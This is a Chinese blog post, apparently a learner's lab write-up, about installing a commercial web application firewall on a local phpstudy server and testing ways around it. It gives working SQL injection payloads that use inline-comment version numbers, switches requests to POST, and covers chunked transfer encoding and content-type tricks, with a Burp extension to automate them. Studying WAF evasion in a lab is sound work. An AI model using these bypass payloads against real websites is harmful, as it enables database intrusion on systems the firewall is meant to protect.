【WAF绕过】绕过XX狗

XX狗

萌新学习之路上必绕的XX狗

搭建过程

搭建过程比较简单,但存在一些小问题

具体说一下我所遇到的

在安装过程中会自动弹出一个配置菜单,需要输入网站信息。一般来讲这些信息会自动获取,但是我所使用的phpstudy2018版即使安装apache但在服务中也无法找到正确服务名。

在这里插入图片描述

解决方法:

需要将phpstudy配置成为系统服务

在这里插入图片描述

安装并开启apache服务

在这里插入图片描述

如果在服务还是没有找到apache的服务话,就需要进入apache的bin目录下安装服务

phpStudy\PHPTutorial\Apache\bin

执行系统命令

httpd.exe -k install -n apache2.4

再次安装即可成功

若需要删除多余的服务执行命令

sc delete apache2.4

绕过XX狗

先确认XX狗保护生效,利用payload成功触发WAF

payload:

?id=0' union select 1,2,3--+

在这里插入图片描述

数字绕过

使用内联注释尝试绕过,发现依然会触发防护

在这里插入图片描述

绕过XX狗有一个重要数字47440,当大于等于47440的数字与内联注释一同使用时就可以达到绕过XX狗的效果,在网站XX狗4.0依然有效

payload:

?id=0' union /*!47440select*/ 1,2,3--+

在这里插入图片描述

更换请求方法

使用GET方法会触发WAF

?a=0+union+select+1;

在这里插入图片描述

?a=0%20union%20/*!37440select*/database()--+

在这里插入图片描述

在BP中更换请求方法为POST,就不会触发WAF

在这里插入图片描述
在这里插入图片描述

XX狗在POST包中会禁止select database()–+


单纯使用pipeline在POST中携带GET脏数据请求,被WAF拦截

在这里插入图片描述

pipeline在POST中携带POST脏数据请求,可以绕过,但应该是POST数据的原因

在这里插入图片描述

也就说使用pipeline的方法无法绕过

分块传输

分块传输需要在http头中添加Transfer-Encoding: chunked

注意要在数据后面添加几个空格,否则会导致无法得到回包
在这里插入图片描述

协议未覆盖(失败)

以下四种常见的content-type类型,我们可以尝试互相替换尝试绕过WAF过滤机制。
注:如图常见的绕过方式为使用multipart/form-data标签,并把name设为参数名内容写入注入语句。

Content-Type: text/html; charset=UTF-8
Content-Type: application/json; charset=utf-8
Content-Type: application/x-www- form-urlencoded;charset=utf-8
Content-Type: multipart/form-data; boundary=something

尝试使用content-type绕过,但失败
在这里插入图片描述


BP分块传输模块

在BP的Extension中添加下载并编译好的模块jar

在这里插入图片描述

安装好jar包后,就能在右键找到分块传输编码的选项
在这里插入图片描述
点击Encoding选项就能轻松利用分块传输绕过WAF

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值